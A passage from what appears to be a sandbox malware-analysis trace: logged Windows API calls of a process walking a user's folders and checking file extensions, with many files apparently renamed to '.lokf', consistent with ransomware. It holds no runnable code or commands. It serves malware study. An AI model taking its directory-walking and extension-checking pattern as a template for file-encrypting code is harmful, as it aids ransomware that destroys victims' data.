cAlternateFileName="MCM9NO~1")) returned 1 [0148.280] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43e2de00, ftCreationTime.dwHighDateTime=0x1d4c938, ftLastAccessTime.dwLowDateTime=0x215861d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x215861d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XeSTpd", cAlternateFileName="")) returned 1 [0148.280] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43e2de00, ftCreationTime.dwHighDateTime=0x1d4c938, ftLastAccessTime.dwLowDateTime=0x215861d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x215861d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XeSTpd", cAlternateFileName="")) returned 0 [0148.280] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.280] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.281] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.281] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\") returned="jYsvlZ\\" [0148.281] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0148.281] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.281] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.281] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.281] PathFindFileNameW (pszPath="") returned="" [0148.281] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f71c0, ftCreationTime.dwHighDateTime=0x1d4c6be, ftLastAccessTime.dwLowDateTime=0x2115bb50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2115bb50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.282] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f71c0, ftCreationTime.dwHighDateTime=0x1d4c6be, ftLastAccessTime.dwLowDateTime=0x2115bb50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2115bb50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.282] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2823a6d0, ftCreationTime.dwHighDateTime=0x1d4cc1d, ftLastAccessTime.dwLowDateTime=0x44ad19c0, ftLastAccessTime.dwHighDateTime=0x1d4d0b5, ftLastWriteTime.dwLowDateTime=0x210e9730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x97fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-zuaS3cxhRUqW6PZe3HQ.mp4.lokf", cAlternateFileName="-ZUAS3~1.LOK")) returned 1 [0148.282] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\-zuaS3cxhRUqW6PZe3HQ.mp4.lokf") returned=".lokf" [0148.282] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e58450, ftCreationTime.dwHighDateTime=0x1d4c97e, ftLastAccessTime.dwLowDateTime=0xa3dbf820, ftLastAccessTime.dwHighDateTime=0x1d4cdaf, ftLastWriteTime.dwLowDateTime=0x2110f890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xef99, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="48nag.mkv.lokf", cAlternateFileName="48NAGM~1.LOK")) returned 1 [0148.282] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\48nag.mkv.lokf") returned=".lokf" [0148.282] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0c2b540, ftCreationTime.dwHighDateTime=0x1d4ca9d, ftLastAccessTime.dwLowDateTime=0x343bcb30, ftLastAccessTime.dwHighDateTime=0x1d4d15b, ftLastWriteTime.dwLowDateTime=0x2110f890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1629d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7_vc_tYF-W1fe3j1GZ.mp4.lokf", cAlternateFileName="7_VC_T~1.LOK")) returned 1 [0148.282] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\7_vc_tYF-W1fe3j1GZ.mp4.lokf") returned=".lokf" [0148.282] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe72cf340, ftCreationTime.dwHighDateTime=0x1d4d13d, ftLastAccessTime.dwLowDateTime=0x93f0e5a0, ftLastAccessTime.dwHighDateTime=0x1d4d07b, ftLastWriteTime.dwLowDateTime=0x211359f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x3885, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ln9Eeh629DhOIJi1iM_F.mp4.lokf", cAlternateFileName="LN9EEH~1.LOK")) returned 1 [0148.282] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\Ln9Eeh629DhOIJi1iM_F.mp4.lokf") returned=".lokf" [0148.282] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbacc1320, ftCreationTime.dwHighDateTime=0x1d4cccf, ftLastAccessTime.dwLowDateTime=0x14391f20, ftLastAccessTime.dwHighDateTime=0x1d4c825, ftLastWriteTime.dwLowDateTime=0x2115bb50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x13665, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qX3sjp a6u.flv.lokf", cAlternateFileName="QX3SJP~1.LOK")) returned 1 [0148.282] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\qX3sjp a6u.flv.lokf") returned=".lokf" [0148.282] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbacc1320, ftCreationTime.dwHighDateTime=0x1d4cccf, ftLastAccessTime.dwLowDateTime=0x14391f20, ftLastAccessTime.dwHighDateTime=0x1d4c825, ftLastWriteTime.dwLowDateTime=0x2115bb50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x13665, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qX3sjp a6u.flv.lokf", cAlternateFileName="QX3SJP~1.LOK")) returned 0 [0148.282] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.283] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.283] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0148.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0148.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0148.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.283] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.283] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.283] PathFindFileNameW (pszPath="") returned="" [0148.283] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.284] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.284] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0148.284] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0148.285] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0148.285] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.285] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.285] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0148.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0148.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0148.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.285] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.285] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.285] PathFindFileNameW (pszPath="") returned="" [0148.285] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.287] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.287] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0148.287] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0148.287] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0148.287] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0148.287] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0148.287] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0148.287] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0148.287] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.288] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.288] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.288] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0148.288] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0148.288] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0148.288] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.288] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.288] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.288] PathFindFileNameW (pszPath="") returned="" [0148.288] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.289] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.289] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0148.289] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0148.289] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.289] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.289] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.289] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="_private\\" [0148.289] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0148.289] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0148.289] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.289] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.289] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.289] PathFindFileNameW (pszPath="") returned="" [0148.290] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x211a7e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x211a7e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.290] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x211a7e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x211a7e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.290] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x211a7e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7634, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico.lokf", cAlternateFileName="FOLDER~1.LOK")) returned 1 [0148.290] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.lokf") returned=".lokf" [0148.290] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x211a7e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7634, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico.lokf", cAlternateFileName="FOLDER~1.LOK")) returned 0 [0148.291] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.291] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.291] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.291] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\") returned="mw2tK3t ch7R6yApjv\\" [0148.291] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\") returned="xw_W- RtiM1Q0r\\" [0148.291] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0148.291] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.291] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.291] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.291] PathFindFileNameW (pszPath="") returned="" [0148.291] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\*", lpFindFileData=0x391fba4 | 